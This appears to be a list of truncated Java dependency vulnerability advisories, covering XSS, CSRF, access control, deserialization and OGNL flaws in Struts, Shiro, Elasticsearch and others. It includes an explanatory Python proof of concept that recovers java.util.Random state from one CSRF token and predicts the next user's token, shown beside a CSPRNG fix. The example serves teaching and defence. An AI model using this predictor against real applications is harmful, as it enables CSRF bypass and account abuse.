Jenkins project Jenkins AWS CodeDeploy Plugin version 1.19 and earlier contains a File and Directory Information Exposure vulnerability in AWSCodeDeployPublisher.java that can result in Disclosure of environment variables. This vulnerability appears to…
[org.graylog2:graylog2-server] Cross-site Scripting in Graylog Server
In Graylog before 2.4.6, XSS was possible in typeahead components, related to components/common/TypeAheadInput.jsx and components/search/QueryInput.ts.
References
https://nvd.nist.gov/vuln/detail/CVE-2018-14380
https://github.com/Graylog2/graylog2-ser…
[org.elasticsearch:elasticsearch] Cross-site scripting in Elasticsearch
Cross-site scripting (XSS) vulnerability in the CORS functionality in Elasticsearch before 1.4.0.Beta1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-6439
ht…
[org.apache.struts:struts2-core] Cross-Site Request Forgery in Apache Struts
Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-7809
http://packetstormsecurity.com/f…
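Why a CSRF token drawn from java.util.Random is predictable, as an added example that is not code from the Struts project: the JavaRandom class below re-implements the 48-bit linear congruential generator that the java.util.Random Javadoc specifies, so the state recovery shown here also works against real JVM output; the token format (a single nextLong() rendered as hex) and the seed value are simplifications chosen for the example, not Struts' actual TokenHelper encoding. One token read from any form is enough to reconstruct the generator state and compute the token the next user will receive, which is exactly what defeats a CSRF check. The corrected form draws tokens from a cryptographically secure generator (java.security.SecureRandom on the JVM; Python's secrets module stands in for it here).

```python
"""Predicting a java.util.Random-derived CSRF token from one observed value.

Added example (not Struts code). JavaRandom models the LCG documented for
java.util.Random; weak_token/strong_token and the seed are hypothetical.
"""
import secrets

MASK48 = (1 << 48) - 1
MULT = 0x5DEECE66D
INC = 0xB


def _signed32(x: int) -> int:
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


def _signed64(x: int) -> int:
    x &= (1 << 64) - 1
    return x - (1 << 64) if x & (1 << 63) else x


class JavaRandom:
    """Bit-exact model of java.util.Random for next(32) and nextLong()."""

    def __init__(self, seed: int):
        self.state = (seed ^ MULT) & MASK48   # Java's initialScramble(seed)

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        obj = cls(0)
        obj.state = state
        return obj

    def next32(self) -> int:
        self.state = (self.state * MULT + INC) & MASK48
        return _signed32(self.state >> 16)

    def next_long(self) -> int:
        hi = self.next32()
        lo = self.next32()
        return _signed64((hi << 32) + lo)


def weak_token(rng: JavaRandom) -> str:
    """Vulnerable pattern: token is one nextLong() from java.util.Random."""
    return f"{rng.next_long() & 0xFFFFFFFFFFFFFFFF:016x}"


def recover_state(token: str) -> int:
    """Recover the generator state from a single observed weak token.

    The first next(32) inside nextLong() leaks the top 32 bits of the 48-bit
    state, so only 2**16 low-bit candidates remain; each is checked against
    the second next(32). Returns the state *after* the token was produced.
    """
    value = int(token, 16)
    top, bottom = value >> 32, value & 0xFFFFFFFF
    # Java forms nextLong() as (hi << 32) + lo with a *signed* lo, so a negative
    # lo borrows 1 from the top word; undo that to get the raw next(32) outputs.
    first_out = (top + (bottom >> 31)) & 0xFFFFFFFF
    second_out = bottom
    for low16 in range(1 << 16):
        s1 = (first_out << 16) | low16
        s2 = (s1 * MULT + INC) & MASK48
        if s2 >> 16 == second_out:
            return s2
    raise ValueError("token was not produced by java.util.Random.nextLong()")


def predict_next_token(observed: str) -> str:
    """Attacker side: from one token, compute the token issued next."""
    return weak_token(JavaRandom.from_state(recover_state(observed)))


def strong_token() -> str:
    """Fixed pattern: tokens from a CSPRNG (SecureRandom on the JVM)."""
    return secrets.token_hex(16)


def demo(seed: int = 20140101) -> bool:
    """Server seeds its generator (seed unknown to the attacker); the attacker
    loads one form, reads its token, and guesses the next user's token."""
    server_rng = JavaRandom(seed)
    attacker_sees = weak_token(server_rng)
    guessed = predict_next_token(attacker_sees)
    victims_token = weak_token(server_rng)
    return guessed == victims_token


if __name__ == "__main__":
    print("weak token predicted:", demo())
    print("strong token sample :", strong_token())
```

The recovery needs no knowledge of the seed or of how many tokens were issued before the observed one, which is why rotating the seed or seeding from the clock does not help; only a generator whose output does not reveal its state (a CSPRNG) closes the hole.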
[org.apache.shiro:shiro-web] Improper Access Control in Apache Shiro
Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.
References
https://nvd.nist.gov/vuln/detail/CVE-2016-6802
https://github.com/apache/shiro/commit/b15ab9…
[org.jboss.resteasy:resteasy-bom] JBoss RESTEasy vulnerable to Improper Input Validation
JBoss RESTEasy before version 3.1.2 could be forced into parsing a request with YamlProvider, resulting in unmarshalling of potentially untrusted data which could allow an attacker to execute arbitrary code with RESTEasy application permissions.
Refere…
[struts:struts] Cross-site Scripting
Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cook…
[org.apache.cayenne:cayenne-parent] XML External Entity Reference in Apache Cayenne
This affects Apache Cayenne 4.1.M1, 3.2.M1, 4.0.M2 to 4.0.M5, 4.0.B1, 4.0.B2, 4.0.RC1, 3.1, 3.1.1, 3.1.2. CayenneModeler is a desktop GUI tool shipped with Apache Cayenne and intended for editing Cayenne ORM models stored as XML files. If an attacker t…
[org.apache.struts:struts2-core] Arbitrary code execution in Apache Struts 2
Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
References
https://nvd…
[org.apache.struts:struts2-core] Cross-site Scripting in Apache Struts
When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the ‘Problem Report’ screen. Also if JSP files are exposed to be accessed directly it’s possible to execute an arbitrary script.
It is generally …